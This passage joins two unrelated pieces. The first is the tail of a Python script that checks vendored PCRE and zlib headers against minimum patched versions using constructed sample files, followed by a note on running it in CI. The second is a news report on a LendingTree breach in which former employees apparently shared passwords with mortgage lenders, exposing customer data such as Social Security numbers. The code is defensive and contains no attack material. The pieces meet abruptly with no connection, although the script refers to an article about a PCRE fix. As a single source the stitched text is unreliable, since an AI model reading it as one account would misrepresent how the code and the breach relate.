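version from its own header, and flags copies older than the version in
which a known fix landed.  The version table and sample headers below are
constructed for the example; feed the table from real advisory data when
using this for an actual audit.
"""
import re
import tempfile
from pathlib import Path


def parse_version(text):
    """Turn '6.7' or '1.2.3' into a tuple of ints so versions compare numerically."""
    return tuple(int(part) for part in text.strip().split("."))


def extract_version(text, pattern):
    """Apply a regex whose capture groups are the version components; join them with dots."""
    match = re.search(pattern, text, re.DOTALL)
    if not match:
        return None
    return ".".join(match.groups())


# Constructed table: library -> (version file under the vendored tree,
# regex with one capture group per version component, minimum fixed version).
# "6.7" for PCRE is the fix version named in the article; "1.2.3" for zlib is a placeholder.
MINIMUM_FIXED = {
    "pcre": ("pcre/pcre.h",
             r"#define\s+PCRE_MAJOR\s+(\d+).*?#define\s+PCRE_MINOR\s+(\d+)",
             "6.7"),
    "zlib": ("zlib/zlib.h",
             r'#define\s+ZLIB_VERSION\s+"(\d+(?:\.\d+)*)"',
             "1.2.3"),
}


def check_vendored(root, table=MINIMUM_FIXED):
    """Return {library: (found_version, minimum_version, status)} for each table entry.

    status is one of "ok", "outdated", "missing" (file absent) or "unparsed"
    (file present but no version string matched), so a silent miss never
    looks like a pass.
    """
    results = {}
    for name, (relpath, pattern, minimum) in table.items():
        path = Path(root) / relpath
        if not path.is_file():
            results[name] = (None, minimum, "missing")
            continue
        found = extract_version(path.read_text(), pattern)
        if found is None:
            results[name] = (None, minimum, "unparsed")
        elif parse_version(found) < parse_version(minimum):
            results[name] = (found, minimum, "outdated")
        else:
            results[name] = (found, minimum, "ok")
    return results


def build_sample_tree(root):
    """Write constructed headers that mimic the real PCRE and zlib version macros."""
    root = Path(root)
    (root / "pcre").mkdir(parents=True, exist_ok=True)
    (root / "pcre" / "pcre.h").write_text(
        "/* constructed sample header */\n#define PCRE_MAJOR 6\n#define PCRE_MINOR 4\n")
    (root / "zlib").mkdir(parents=True, exist_ok=True)
    (root / "zlib" / "zlib.h").write_text(
        '/* constructed sample header */\n#define ZLIB_VERSION "1.2.3"\n')


def run_demo():
    """Build the constructed tree in a temp dir and return the check results."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        return check_vendored(tmp)


if __name__ == "__main__":
    for lib, (found, minimum, status) in run_demo().items():
        print(f"{lib:6} found={found!s:8} minimum={minimum:8} {status}")
```

Run as-is it reports the constructed PCRE copy as outdated (6.4 against the 6.7 threshold) and the zlib copy as current. In practice the table would be generated from the upstream changelogs or an advisory feed, and the check would run in CI so that a vendored copy cannot drift behind a security fix without someone noticing.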
Web-based lending exchange LendingTree, which generates leads in the mortgage business by accepting online customer information, yesterday disclosed that it believes several former employees illicitly helped a handful of mortgage lenders gain access to customer data.
"Recently, LendingTree learned that several former employees may have helped a handful of mortgage lenders gain access to LendingTree's customer information by sharing confidential passwords with the lenders," LendingTree stated in a letter sent April 21 to its customers. "When we learned of this situation, we quickly contacted the authorities, and LendingTree is helping with the investigation. We promptly made several system-security changes. We also brought lawsuits against those involved."
LendingTree spokeswoman Allison Vail acknowledged the letter had been sent to customers, but declined to provide further details, such as how many customers would be affected.
LendingTree believes the lenders gained illicit entry to its data systems to access LendingTree’s loan-request forms between October 2006 and early 2008. The Charlotte, N.C.-based firm stated that the loan-request forms contained such customer data as name, address, e-mail address, telephone number, Social Security Number, income and employment information.
LendingTree said it is not aware of identity theft or fraudulent activity resulting from the breach.